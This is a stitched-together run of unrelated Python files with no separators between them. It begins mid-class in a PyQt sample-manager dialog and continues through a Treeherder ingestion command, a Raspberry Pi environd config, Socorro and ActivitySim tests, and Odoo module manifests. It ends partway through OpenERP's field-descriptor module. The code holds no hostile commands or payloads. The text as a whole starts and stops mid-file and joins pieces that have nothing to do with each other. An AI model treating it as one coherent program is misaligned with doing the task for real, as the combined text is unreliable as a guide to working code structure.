                        self.buttons[k][row_index].clicked.connect(partial(self.ask_apply_changes, [row_index, Dialog]))
                        self.buttons[k][row_index].setStyleSheet("background-color: #ffeedd")

                    elif k == 'Delete':
                        self.buttons[k][row_index].clicked.connect(partial(self.ask_delete_confirm1, [row_index, Dialog]))
                        self.buttons[k][row_index].setStyleSheet("background-color: #ffcddd")

                    self.gridLayout.addWidget(self.buttons[k][row_index], ypos+1, xpos, 1, 1)
                    xpos += 1

            # increments
            ypos += 1
            xpos = 1
        Dialog.resize(1000, 70 + (30 * ypos))


        # self.add_row(Dialog)

    def ask_delete_confirm1(self, args):
        sid = args[0]
        Dialog = args[1]

        # check if radio button is checked.
        if self.radios[sid].isChecked():
            msg = "Are you sure you want to delete the following sample :  \n\n"
            details = ""
            for c in self.samplesdf.columns:
                details += str(c) + ": " + str(self.samplesdf.at[sid, c]) + "\n"
            reply = QtGui.QMessageBox.warning(self, 'Confirmation #1',
                                           msg + details, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)

            if reply == QtGui.QMessageBox.Yes:
                msg2 = "Are you sure REALLY REALLY sure you want to delete the following sample ? \n\n" + \
                       "This is the last confirmation message. After confirming, the files will be PERMANENTLY deleted and the data WILL be lost ! \n\n"

                msgbox = QtGui.QMessageBox.critical(self, 'Confirmation #2',
                               msg2 + details, QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No)


                reply2 = msgbox

                if reply2 ==  QtGui.QMessageBox.Yes:
                    # deletion confirmed
                    self.delete_confirmed(sid)
                    self.update_form( Dialog)

        else:
            QtGui.QMessageBox.question(self, 'Error', 'Please select the sample you want to delete on the left',
                                       QtGui.QMessageBox.Ok)

    def delete_confirmed(self, sid):
        # sample file
        filename = self.samplesdf.loc[sid, 'filename']

        # delete row in samplesdf
        self.samplesdf = self.samplesdf.drop(self.samplesdf.index[sid])
        self.samplesdf.to_csv(self.samplefile, index=False, encoding='ISO-8859-1')

        # delete file in rawdata
        if os.path.isfile(os.path.join(self.datafolder, "rawdata", filename)):
            os.remove(os.path.join(self.datafolder, "rawdata", filename))
            # print(" delete: ", os.path.join(self.datafolder, "rawdata", filename))

        # delete file in data
        if os.path.isfile(os.path.join(self.datafolder, filename)):
            os.remove(os.path.join(self.datafolder, filename))
            # print(" delete: ", os.path.join(self.datafolder, filename))

    def ask_apply_changes(self, args):
        sid = args[0]
        Dialog = args[1]

        newdata=defaultdict(str)
        for k in self.edits.keys():
            newdata[k] = self.edits[k][sid].text()
        for k in self.combobox.keys():
            newdata[k] = self.combobox[k][sid].currentText()

        details = ""
        for k in newdata:
            details += str(self.samplesdf.at[sid, k]) + '\t --> \t' + str(newdata[k]) + "\n"

        msg = "Are you sure you want to apply the changes to sample " + str(self.samplesdf.at[sid, 'samplename']) + " ?\n\n"
        reply = QtGui.QMessageBox.question(self, 'Modify a sample', msg + details, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)

        if reply == QtGui.QMessageBox.Yes:
            self.apply_changes_confirmed(sid, newdata)
            self.update_form(Dialog)
        else:
            print('cancel modification')

    def apply_changes_confirmed(self, sid, newdata):
        # rename files
        newdata['filename'] = str(newdata['date']) + "_" + str(newdata['samplename']) + ".csv"
        os.rename(os.path.join(self.datafolder, str(self.samplesdf.at[sid, 'filename'])),
                  os.path.join(self.datafolder, str(newdata['filename'])))
        os.rename(os.path.join(self.datafolder, "rawdata", str(self.samplesdf.at[sid, 'filename'])),
                  os.path.join(self.datafolder, "rawdata", str(newdata['filename'])))

        for k in newdata.keys():
            self.samplesdf.at[sid, k] = newdata[k]
            self.samplesdf.to_csv(self.samplefile, index=False, encoding='ISO-8859-1')

    def update_form(self, Dialog):
        # empty variables
        self.edits = None
        self.combobox = None
        self.buttons = None
        self.radios = None
        self.labs = None
        self.labels = None

        # empty layout
        for i in reversed(range(self.gridLayout.count())):
            self.gridLayout.itemAt(i).widget().setParent(None)


        self.prepare_form(Dialog)

    def retranslateUi(self, Dialog):
        Dialog.setWindowTitle(_translate("Dialog", "Samples Manager", None))
        # self.label.setText(_translate("Dialog", "File", None))

from cProfile import Profile
from optparse import make_option

from django.conf import settings
from django.core.management.base import (BaseCommand,
                                         CommandError)

from treeherder.etl.buildapi import (Builds4hJobsProcess,
                                     PendingJobsProcess,
                                     RunningJobsProcess)
from treeherder.etl.pushlog import HgPushlogProcess
from treeherder.model.derived import RefDataManager


class Command(BaseCommand):

    """Management command to ingest data from a single push."""

    help = "Ingests a single push into treeherder"
    args = '<project> <changeset>'

    option_list = BaseCommand.option_list + (
        make_option('--profile-file',
                    action='store',
                    dest='profile_file',
                    default=None,
                    help='Profile command and write result to profile file'),

        make_option('--filter-job-group',
                    action='store',
                    dest='filter_job_group',
                    default=None,
                    help="Only process jobs in specified group symbol "
                    "(e.g. 'T')")
    )

    def _handle(self, *args, **options):
        if len(args) != 2:
            raise CommandError("Need to specify (only) branch and changeset")

        (project, changeset) = args

        # get reference to repo
        rdm = RefDataManager()
        repos = filter(lambda x: x['name'] == project,
                       rdm.get_all_repository_info())
        if not repos:
            raise CommandError("No project found named '%s'" % project)
        repo = repos[0]

        # make sure all tasks are run synchronously / immediately
        settings.CELERY_ALWAYS_EAGER = True

        # get hg pushlog
        pushlog_url = '%s/json-pushes/?full=1&version=2' % repo['url']

        # ingest this particular revision for this project
        process = HgPushlogProcess()
        # Use the actual push SHA, in case the changeset specified was a tag
        # or branch name (eg tip). HgPushlogProcess returns the full SHA, but
        # job ingestion expects the short version, so we truncate it.
        push_sha = process.run(pushlog_url, project, changeset=changeset)[0:12]

        Builds4hJobsProcess().run(filter_to_project=project,
                                  filter_to_revision=push_sha,
                                  filter_to_job_group=options['filter_job_group'])
        PendingJobsProcess().run(filter_to_project=project,
                                 filter_to_revision=push_sha,
                                 filter_to_job_group=options['filter_job_group'])
        RunningJobsProcess().run(filter_to_project=project,
                                 filter_to_revision=push_sha,
                                 filter_to_job_group=options['filter_job_group'])

    def handle(self, *args, **options):

        if options['profile_file']:
            profiler = Profile()
            profiler.runcall(self._handle, *args, **options)
            profiler.dump_stats(options['profile_file'])
        else:
            self._handle(*args, **options)

#
# This is the configuration file for the RPi environd
#

### Presentation - General

# All datetime stamps use typical strftime codes: https://docs.python.org/2/library/datetime.html#strftime-strptime-behavior

# The date/time stamp of the last (most current) reading.
present_lastread_stamp = "%I:%M %p on %A, %b %d"

# How many decimal places to round to when displaying temperatures. For 
# presentation only - does not impact reading precision in the database.
present_temp_precision = 1


### Presentation - Recent Graph

# The date/time stamp on the x-axis
present_graph_recent_x = "%I:%M %p"

# How many data points to use. 
# This does _not_ reflect how many points will be drawn. Also consider how 
# often the readings are made - e.g., if a value is recorded every 15 minutes,
# then a full day's worth of data requires 24x(60/15) = 96 points.
present_recent_point_count = 720

# How much to reduce the specified number of data points. 
# This is how many points will be drawn. The value of 
# present_recent_point_count is divided in to this many chunks, and then time 
# stamp and value of each chunk is averaged.
present_recent_reduce_to = 16

### Presentation - All Time Graph

# < tbd... not implemented yet > 

### Files

# The static html file that is output. Must be writable by the user running 
# environd. Presumably this is in the www directory of a web server.
www_out = "/var/www/environd.html"

# The template to use for generating static html.
# Must be readable by the user running environd.
html_template = "/opt/environd/template/environd.tpl"

# The (flat text) database file.
# Must be writable by the user running environd, and must exist, even if empty.
database = "/opt/environd/database/temperature_readings.json"

# The log file. Must be writable by the user running environd.
log_file = "/var/log/environd.log"

# Format of the timestamping used internally. 
# Does not impact presentation unless presented values are omitted.
datetime_func_format = "%Y%m%dT%H%M%S"


### Tinker/Debug

# Set to True to print all log messages to the terminal, or False to suppress 
# most output.
terminal_verbosity = True

# The size in mb after which the db file is rotated. 
# The entire db is loaded in to memory, but each reading is a mere 60-80
# bytes, so 100 megs is about 10 years of recording every 15 minutes.
max_db_file_size = 100 # mb

# coding=utf-8

''' tagsPlorer package entry point  (C) 2021-2021  Arne Bachmann  https://github.com/ArneBachmann/tagsplorer '''

from tagsplorer import tp


tp.Main().parse_and_run()
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.

from socorro.lib import datetimeutil
from socorro.unittest.external.es.base import (
    ElasticsearchTestCase,
    SuperSearchWithFields,
    minimum_es_version,
)

# Uncomment these lines to decrease verbosity of the elasticsearch library
# while running unit tests.
# import logging
# logging.getLogger('elasticsearch').setLevel(logging.ERROR)
# logging.getLogger('requests').setLevel(logging.ERROR)


class IntegrationTestAnalyzers(ElasticsearchTestCase):
    """Test the custom analyzers we create in our indices. """

    def setUp(self):
        super(IntegrationTestAnalyzers, self).setUp()

        self.api = SuperSearchWithFields(config=self.config)
        self.now = datetimeutil.utc_now()

    @minimum_es_version('1.0')
    def test_semicolon_keywords(self):
        """Test the analyzer called `semicolon_keywords`.

        That analyzer creates tokens (terms) by splitting the input on
        semicolons (;) only.
        """
        self.index_crash({
            'date_processed': self.now,
            'app_init_dlls': '/path/to/dll;;foo;C:\\bar\\boo',
        })
        self.index_crash({
            'date_processed': self.now,
            'app_init_dlls': '/path/to/dll;D:\\bar\\boo',
        })
        self.refresh_index()

        res = self.api.get(
            app_init_dlls='/path/to/dll',
            _facets=['app_init_dlls'],
        )
        assert res['total'] == 2
        assert 'app_init_dlls' in res['facets']
        facet_terms = [x['term'] for x in res['facets']['app_init_dlls']]
        assert '/path/to/dll' in facet_terms
        assert 'c:\\bar\\boo' in facet_terms
        assert 'foo' in facet_terms

"""Django module for the OS2datascanner project."""

# -*- coding: utf-8 -*-
# © 2009 Pexego/Comunitea
# © 2011-2012 Iker Coranti (www.avanzosc.es)
# © 2014 Juanjo Algaz (gutierrezweb.es)
# © 2014-2016 Pedro M. Baeza
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl-3.0).

{
    "name": "Account balance reporting engine",
    "version": "8.0.1.2.0",
    "author": "Pexego, "
              "AvanzOSC, "
              "Tecnativa, "
              "Odoo Community Association (OCA)",
    "website": "http://www.pexego.es",
    "category": "Accounting & Finance",
    "contributors": [
        "Juanjo Algaz <juanjoa@malagatic.com>",
        "Joaquín Gutierrez <joaquing.pedrosa@gmail.com>",
        "Pedro M. Baeza <pedro.baeza@tecnativa.com>",
        "Oihane Crucelaegui <oihanecrucelaegi@avanzosc.es>",
    ],
    "license": 'AGPL-3',
    "depends": [
        "account",
    ],
    "data": [
        "security/ir.model.access.csv",
        "views/account_account_view.xml",
        "views/account_balance_reporting_template_view.xml",
        "views/account_balance_reporting_report_view.xml",
        "views/account_balance_reporting_menu.xml",
        "report/account_balance_reporting_reports.xml",
        "report/report_generic.xml",
        "wizard/wizard_print_view.xml",
    ],
    "installable": True,
}

# -*- coding:utf-8 -*-
#
#
#    Copyright (C) 2013 Michael Telahun Makonnen <mmakonnen@gmail.com>.
#    All Rights Reserved.
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as published
#    by the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
#

{
    'name': 'Capture picture with webcam',
    'version': '1.0',
    'category': 'Generic Modules/Human Resources',
    'description': """
TApplicant WebCam
=========

Capture employee pictures with an attached web cam.
    """,
    'author': "Michael Telahun Makonnen <mmakonnen@gmail.com>,"
    "Odoo Community Association (OCA)",
    'website': 'http://miketelahun.wordpress.com',
    'license': 'AGPL-3',
    'depends': [
        'hr',
        'web',
        'trip'
    ],
    'js': [
        'static/src/js/jquery.webcam.js',
        'static/src/js/tapplicant_webcam.js',
    ],
    'css': [
        'static/src/css/tapplicant_webcam.css',
    ],
    'qweb': [
        'static/src/xml/tapplicant_webcam.xml',
    ],
    'data': [
        'tapplicant_webcam_data.xml',
        'tapplicant_webcam_view.xml',
    ],
    'installable': True,
    'active': False,
}

# ActivitySim
# Copyright (C) 2014-2015 Synthicity, LLC
# See full license in LICENSE.txt.

import os.path

import numpy as np
import pandas as pd
import pandas.util.testing as pdt
import pytest

from ..activitysim import eval_variables
from .. import mnl


# this is lifted straight from urbansim's test_mnl.py
@pytest.fixture(scope='module', params=[
    ('fish.csv',
        'fish_choosers.csv',
        pd.DataFrame(
            [[-0.02047652], [0.95309824]], index=['price', 'catch'],
            columns=['Alt']),
        pd.DataFrame([
            [0.2849598, 0.2742482, 0.1605457, 0.2802463],
            [0.1498991, 0.4542377, 0.2600969, 0.1357664]],
            columns=['beach', 'boat', 'charter', 'pier']))])
def test_data(request):
    data, choosers, spec, probabilities = request.param
    return {
        'data': data,
        'choosers': choosers,
        'spec': spec,
        'probabilities': probabilities
    }


@pytest.fixture
def choosers(test_data):
    filen = os.path.join(
        os.path.dirname(__file__), 'data', test_data['choosers'])
    return pd.read_csv(filen)


@pytest.fixture
def spec(test_data):
    return test_data['spec']


@pytest.fixture
def choosers_dm(choosers, spec):
    return eval_variables(spec.index, choosers)


@pytest.fixture
def utilities(choosers_dm, spec, test_data):
    utils = choosers_dm.dot(spec).astype('float')
    return pd.DataFrame(
        utils.as_matrix().reshape(test_data['probabilities'].shape),
        columns=test_data['probabilities'].columns)


def test_utils_to_probs(utilities, test_data):
    probs = mnl.utils_to_probs(utilities)
    pdt.assert_frame_equal(probs, test_data['probabilities'])


def test_utils_to_probs_raises():
    with pytest.raises(RuntimeError):
        mnl.utils_to_probs(
            pd.DataFrame([[1, 2, np.inf, 3]]))


def test_make_choices_only_one():
    probs = pd.DataFrame(
        [[1, 0, 0], [0, 1, 0]], columns=['a', 'b', 'c'], index=['x', 'y'])
    choices = mnl.make_choices(probs)

    pdt.assert_series_equal(
        choices,
        pd.Series([0, 1], index=['x', 'y']))


def test_make_choices_real_probs(random_seed, utilities):
    probs = mnl.utils_to_probs(utilities)
    choices = mnl.make_choices(probs)

    pdt.assert_series_equal(
        choices,
        pd.Series([1, 2], index=[0, 1]))


@pytest.fixture(scope='module')
def interaction_choosers():
    return pd.DataFrame({
        'attr': ['a', 'b', 'c', 'b']},
        index=['w', 'x', 'y', 'z'])


@pytest.fixture(scope='module')
def interaction_alts():
    return pd.DataFrame({
        'prop': [10, 20, 30, 40]},
        index=[1, 2, 3, 4])


def test_interaction_dataset_no_sample(interaction_choosers, interaction_alts):
    expected = pd.DataFrame({
        'attr': ['a'] * 4 + ['b'] * 4 + ['c'] * 4 + ['b'] * 4,
        'prop': [10, 20, 30, 40] * 4,
        'chooser_idx': ['w'] * 4 + ['x'] * 4 + ['y'] * 4 + ['z'] * 4},
        index=[1, 2, 3, 4] * 4)

    interacted = mnl.interaction_dataset(
        interaction_choosers, interaction_alts)

    interacted, expected = interacted.align(expected, axis=1)
    pdt.assert_frame_equal(interacted, expected)


def test_interaction_dataset_sampled(
        interaction_choosers, interaction_alts, random_seed):
    expected = pd.DataFrame({
        'attr': ['a'] * 2 + ['b'] * 2 + ['c'] * 2 + ['b'] * 2,
        'prop': [30, 40, 10, 30, 40, 10, 20, 10],
        'chooser_idx': ['w'] * 2 + ['x'] * 2 + ['y'] * 2 + ['z'] * 2},
        index=[3, 4, 1, 3, 4, 1, 2, 1])

    interacted = mnl.interaction_dataset(
        interaction_choosers, interaction_alts, sample_size=2)

    interacted, expected = interacted.align(expected, axis=1)
    pdt.assert_frame_equal(interacted, expected)

# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2013-2014 OpenERP (<http://www.openerp.com>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

""" High-level objects for fields. """

from collections import OrderedDict
from datetime import date, datetime
from functools import partial
from operator import attrgetter
from types import NoneType
import logging
import pytz
import xmlrpclib

from openerp.tools import float_round, frozendict, html_sanitize, ustr, OrderedSet
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT

DATE_LENGTH = len(date.today().strftime(DATE_FORMAT))
DATETIME_LENGTH = len(datetime.now().strftime(DATETIME_FORMAT))
EMPTY_DICT = frozendict()

_logger = logging.getLogger(__name__)

class SpecialValue(object):
    """ Encapsulates a value in the cache in place of a normal value. """
    def __init__(self, value):
        self.value = value
    def get(self):
        return self.value

class FailedValue(SpecialValue):
    """ Special value that encapsulates an exception instead of a value. """
    def __init__(self, exception):
        self.exception = exception
    def get(self):
        raise self.exception

def _check_value(value):
    """ Return ``value``, or call its getter if ``value`` is a :class:`SpecialValue`. """
    return value.get() if isinstance(value, SpecialValue) else value


def resolve_all_mro(cls, name, reverse=False):
    """ Return the (successively overridden) values of attribute ``name`` in ``cls``
        in mro order, or inverse mro order if ``reverse`` is true.
    """
    klasses = reversed(cls.__mro__) if reverse else cls.__mro__
    for klass in klasses:
        if name in klass.__dict__:
            yield klass.__dict__[name]


class MetaField(type):
    """ Metaclass for field classes. """
    by_type = {}

    def __new__(meta, name, bases, attrs):
        """ Combine the ``_slots`` dict from parent classes, and determine
        ``__slots__`` for them on the new class.
        """
        base_slots = {}
        for base in reversed(bases):
            base_slots.update(getattr(base, '_slots', ()))

        slots = dict(base_slots)
        slots.update(attrs.get('_slots', ()))

        attrs['__slots__'] = set(slots) - set(base_slots)
        attrs['_slots'] = slots
        return type.__new__(meta, name, bases, attrs)

    def __init__(cls, name, bases, attrs):
        super(MetaField, cls).__init__(name, bases, attrs)
        if cls.type and cls.type not in MetaField.by_type:
            MetaField.by_type[cls.type] = cls

        # compute class attributes to avoid calling dir() on fields
        cls.column_attrs = []
        cls.related_attrs = []
        cls.description_attrs = []
        for attr in dir(cls):
            if attr.startswith('_column_'):
                cls.column_attrs.append((attr[8:], attr))
            elif attr.startswith('_related_'):
                cls.related_attrs.append((attr[9:], attr))
            elif attr.startswith('_description_'):
                cls.description_attrs.append((attr[13:], attr))


class Field(object):
    """ The field descriptor contains the field definition, and manages accesses
        and assignments of the corresponding field on records. The following
        attributes may be provided when instanciating a field:

        :param string: the label of the field seen by users (string); if not
            set, the ORM takes the field name in the class (capitalized).

        :param help: the tooltip of the field seen by users (string)

        :param readonly: whether the field is readonly (boolean, by default ``False``)

        :param required: whether the value of the field is required (boolean, by
            default ``False``)

        :param index: whether the field is indexed in database (boolean, by
            default ``False``)

        :param default: the default value for the field; this is either a static
            value, or a function taking a recordset and returning a value

        :param states: a dictionary mapping state values to lists of UI attribute-value
            pairs; possible attributes are: 'readonly', 'required', 'invisible'.
            Note: Any state-based condition requires the ``state`` field value to be
            available on the client-side UI. This is typically done by including it in
            the relevant views, possibly made invisible if not relevant for the
            end-user.

        :param groups: comma-separated list of group xml ids (string); this
            restricts the field access to the users of the given groups only

        :param bool copy: whether the field value should be copied when the record
            is duplicated (default: ``True`` for normal fields, ``False`` for
            ``one2many`` and computed fields, including property fields and
            related fields)

        :param string oldname: the previous name of this field, so that ORM can rename
            it automatically at migration

        .. _field-computed:

        .. rubric:: Computed fields

        One can define a field whose value is computed instead of simply being
        read from the database. The attributes that are specific to computed
        fields are given below. To define such a field, simply provide a value
        for the attribute ``compute``.

        :param compute: name of a method that computes the field

        :param inverse: name of a method that inverses the field (optional)

        :param search: name of a method that implement search on the field (optional)

        :param store: whether the field is stored in database (boolean, by
            default ``False`` on computed fields)

        :param compute_sudo: whether the field should be recomputed as superuser
            to bypass access rights (boolean, by default ``False``)

        The methods given for ``compute``, ``inverse`` and ``search`` are model
        methods. Their signature is shown in the following example::

            upper = fields.Char(compute='_compute_upper',
                                inverse='_inverse_upper',
                                search='_search_upper')

            @api.depends('name')
            def _compute_upper(self):
                for rec in self:
                    rec.upper = rec.name.upper() if rec.name else False

            def _inverse_upper(self):
                for rec in self:
                    rec.name = rec.upper.lower() if rec.upper else False

            def _search_upper(self, operator, value):
                if operator == 'like':
                    operator = 'ilike'
                return [('name', operator, value)]

        The compute method has to assign the field on all records of the invoked
        recordset. The decorator :meth:`openerp.api.depends` must be applied on
        the compute method to specify the field dependencies; those dependencies
        are used to determine when to recompute the field; recomputation is
        automatic and guarantees cache/database consistency. Note that the same
        method can be used for several fields, you simply have to assign all the
        given fields in the method; the method will be invoked once for all
        those fields.

        By default, a computed field is not stored to the database, and is
        computed on-the-fly. Adding the attribute ``store=True`` will store the
        field's values in the database. The advantage of a stored field is that
        searching on that field is done by the database itself. The disadvantage
        is that it requires database updates when the field must be recomputed.

        The inverse method, as its name says, does the inverse of the compute
        method: the invoked records have a value for the field, and you must
        apply the necessary changes on the field dependencies such that the
        computation gives the expected value. Note that a computed field without
        an inverse method is readonly by default.

        The search method is invoked when processing domains before doing an
        actual search on the model. It must return a domain equivalent to the
        condition: ``field operator value``.

        .. _field-related:

        .. rubric:: Related fields

        The value of a related field is given by following a sequence of
        relational fields and reading a field on the reached model. The complete
        sequence of fields to traverse is specified by the attribute

        :param related: sequence of field names

        Some field attributes are automatically copied from the source field if
        they are not redefined: ``string``, ``help``, ``readonly``, ``required`` (only
        if all fields in the sequence are required), ``groups``, ``digits``, ``size``,
        ``translate``, ``sanitize``, ``selection``, ``comodel_name``, ``domain``,
        ``context``. All semantic-free attributes are copied from the source
        field.

        By default, the values of related fields are not stored to the database.
        Add the attribute ``store=True`` to make it stored, just like computed
        fields. Related fields are automatically recomputed when their
        dependencies are modified.

        .. _field-company-dependent:

        .. rubric:: Company-dependent fields

        Formerly known as 'property' fields, the value of those fields depends
        on the company. In other words, users that belong to different companies
        may see different values for the field on a given record.

        :param company_dependent: whether the field is company-dependent (boolean)

        .. _field-incremental-definition:

        .. rubric:: Incremental definition

        A field is defined as class attribute on a model class. If the model
        is extended (see :class:`~openerp.models.Model`), one can also extend
        the field definition by redefining a field with the same name and same
        type on the subclass. In that case, the attributes of the field are
        taken from the parent class and overridden by the ones given in
        subclasses.

        For instance, the second class below only adds a tooltip on the field
        ``state``::

            class First(models.Model):
                _name = 'foo'
                state = fields.Selection([...], required=True)

            class Second(models.Model):
                _inherit = 'foo'
                state = fields.Selection(help="Blah blah blah")

    """
    __metaclass__ = MetaField

    type = None                         # type of the field (string)
    relational = False                  # whether the field is a relational one

    _slots = {
        '_attrs': EMPTY_DICT,           # dictionary of field attributes; it contains:
                                        #  - all attributes after __init__()
                                        #  - free attributes only after set_class_name()

        'automatic': False,             # whether the field is automatically created ("magic" field)
        'inherited': False,             # whether the field is inherited (_inherits)
        'column': None,                 # the column corresponding to the field
        'setup_done': False,            # whether the field has been set up

        'name': None,                   # name of the field
        'model_name': None,             # name of the model of this field
        'comodel_name': None,           # name of the model of values (if relational)

        'store': True,                  # whether the field is stored in database
        'index': False,                 # whether the field is indexed in database
        'manual': False,                # whether the field is a custom field
        'copy': True,                   # whether the field is copied over by BaseModel.copy()
        'depends': (),                  # collection of field dependencies
        'recursive': False,             # whether self depends on itself
        'compute': None,                # compute(recs) computes field on recs
        'compute_sudo': False,          # whether field should be recomputed as admin
        'inverse': None,                # inverse(recs) inverses field on recs
        'search': None,                 # search(recs, operator, value) searches on self
        'related': None,                # sequence of field names, for related fields
        'related_sudo': True,           # whether related fields should be read as admin
        'company_dependent': False,     # whether ``self`` is company-dependent (property field)
        'default': None,                # default(recs) returns the default value

        'string': None,                 # field label
        'help': None,                   # field tooltip
        'readonly': False,              # whether the field is readonly
        'required': False,              # whether the field is required
        'states': None,                 # set readonly and required depending on state
        'groups': None,                 # csv list of group xml ids
        'change_default': False,        # whether the field may trigger a "user-onchange"
        'deprecated': None,             # whether the field is deprecated

        'inverse_fields': (),           # collection of inverse fields (objects)
        'computed_fields': (),          # fields computed with the same method as self
        'related_field': None,          # corresponding related field
        '_triggers': (),                # invalidation and recomputation triggers
    }

    def __init__(self, string=None, **kwargs):
        kwargs['string'] = string
        attrs = {key: val for key, val in kwargs.iteritems() if val is not None}
        self._attrs = attrs or EMPTY_DICT

    def __getattr__(self, name):
        """ Access non-slot field attribute. """
        try:
            return self._attrs[name]
        except KeyError:
            raise AttributeError(name)

    def __setattr__(self, name, value):
        """ Set slot or non-slot field attribute. """
        try:
            object.__setattr__(self, name, value)
        except AttributeError:
            if self._attrs:
                self._attrs[name] = value
            else:
                self._attrs = {name: value}     # replace EMPTY_DICT

    def __delattr__(self, name):
        """ Remove non-slot field attribute. """
        try:
            del self._attrs[name]
        except KeyError:
            raise AttributeError(name)

    def new(self, **kwargs):
        """ Return a field of the same type as ``self``, with its own parameters. """
        return type(self)(**kwargs)

    def set_class_name(self, cls, name):
        """ Assign the model class and field name of ``self``. """
        self_attrs = self._attrs
        for attr, value in self._slots.iteritems():
            setattr(self, attr, value)

        self.model_name = cls._name
        self.name = name

        # determine all inherited field attributes
        attrs = {}
        for field in resolve_all_mro(cls, name, reverse=True):
            if isinstance(field, type(self)):
                attrs.update(field._attrs)
            else:
                attrs.clear()
        attrs.update(self_attrs)        # necessary in case self is not in cls

        # initialize ``self`` with ``attrs``
        if attrs.get('compute'):
            # by default, computed fields are not stored, not copied and readonly
            attrs['store'] = attrs.get('store', False)
            attrs['copy'] = attrs.get('copy', False)
            attrs['readonly'] = attrs.get('readonly', not attrs.get('inverse'))
        if attrs.get('related'):
            # by default, related fields are not stored and not copied
            attrs['store'] = attrs.get('store', False)
            attrs['copy'] = attrs.get('copy', False)

        # fix for function fields overridden by regular columns
        if not isinstance(attrs.get('column'), (NoneType, fields.function)):
            attrs.pop('store', None)

        for attr, value in attrs.iteritems():
            setattr(self, attr, value)

        if not self.string and not self.related:
            # related fields get their string from their parent field
            self.string = name.replace('_', ' ').capitalize()

        # determine self.default and cls._defaults in a consistent way
        self._determine_default(cls, name)

    def _determine_default(self, cls, name):
        """ Retrieve the default value for ``self`` in the hierarchy of ``cls``, and
            determine ``self.default`` and ``cls._defaults`` accordingly.
        """
        self.default = None

        # traverse the class hierarchy upwards, and take the first field
        # definition with a default or _defaults for self
        for klass in cls.__mro__:
            if name in klass.__dict__:
                field = klass.__dict__[name]
                if not isinstance(field, type(self)):
                    # klass contains another value overridden by self
                    return

                if 'default' in field._attrs:
                    # take the default in field, and adapt it for cls._defaults
                    value = field._attrs['default']
                    if callable(value):
                        from openerp import api
                        self.default = value
                        cls._defaults[name] = api.model(
                            lambda recs: self.convert_to_write(value(recs))
                        )
                    else:
                        self.default = lambda recs: value
                        cls._defaults[name] = value
                    return

            defaults = klass.__dict__.get('_defaults') or {}
            if name in defaults:
                # take the value from _defaults, and adapt it for self.default
                value = defaults[name]
                if callable(value):
                    func = lambda recs: value(recs._model, recs._cr, recs._uid, recs._context)
                else:
                    func = lambda recs: value
                self.default = lambda recs: self.convert_to_cache(
                    func(recs), recs, validate=False,
                )
                cls._defaults[name] = value
                return

    def __str__(self):
        return "%s.%s" % (self.model_name, self.name)

    def __repr__(self):
        return "%s.%s" % (self.model_name, self.name)

    ############################################################################
    #
    # Field setup
    #

    def setup(self, env):
        """ Make sure that ``self`` is set up, except for recomputation triggers. """
        if not self.setup_done:
            if self.related:
                self._setup_related(env)
            else:
                self._setup_regular(env)
            self.setup_done = True

    #
    # Setup of non-related fields
    #

    def _setup_regular(self, env):
        """ Setup the attributes of a non-related field. """
        recs = env[self.model_name]

        def make_depends(deps):
            return tuple(deps(recs) if callable(deps) else deps)

        # convert compute into a callable and determine depends
        if isinstance(self.compute, basestring):
            # if the compute method has been overridden, concatenate all their _depends
            self.depends = ()
            for method in resolve_all_mro(type(recs), self.compute, reverse=True):
                self.depends += make_depends(getattr(method, '_depends', ()))
            self.compute = getattr(type(recs), self.compute)
        else:
            self.depends = make_depends(getattr(self.compute, '_depends', ()))

        # convert inverse and search into callables
        if isinstance(self.inverse, basestring):
            self.inverse = getattr(type(recs), self.inverse)
        if isinstance(self.search, basestring):
            self.search = getattr(type(recs), self.search)

    #
    # Setup of related fields
    #

    def _setup_related(self, env):
        """ Setup the attributes of a related field. """
        # fix the type of self.related if necessary
        if isinstance(self.related, basestring):
            self.related = tuple(self.related.split('.'))

        # determine the chain of fields, and make sure they are all set up
        recs = env[self.model_name]
        fields = []
        for name in self.related:
            field = recs._fields[name]
            field.setup(env)
            recs = recs[name]
            fields.append(field)

        self.related_field = field

        # check type consistency
        if self.type != field.type:
            raise Warning("Type of related field %s is inconsistent with %s" % (self, field))

        # determine dependencies, compute, inverse, and search
        self.depends = ('.'.join(self.related),)
        self.compute = self._compute_related
        if not (self.readonly or field.readonly):
            self.inverse = self._inverse_related
        if field._description_searchable:
            # allow searching on self only if the related field is searchable
            self.search = self._search_related

        # copy attributes from field to self (string, help, etc.)
        for attr, prop in self.related_attrs:
            if not getattr(self, attr):
                setattr(self, attr, getattr(field, prop))

        for attr, value in field._attrs.iteritems():
            if attr not in self._attrs:
                setattr(self, attr, value)

        # special case for states: copy it only for inherited fields
        if not self.states and self.inherited:
            self.states = field.states

        # special case for required: check if all fields are required
        if not self.store and not self.required:
            self.required = all(field.required for field in fields)

    def _compute_related(self, records):
        """ Compute the related field ``self`` on ``records``. """
        # when related_sudo, bypass access rights checks when reading values
        others = records.sudo() if self.related_sudo else records
        for record, other in zip(records, others):
            if not record.id:
                # draft record, do not switch to another environment
                other = record
            # traverse the intermediate fields; follow the first record at each step
            for name in self.related[:-1]:
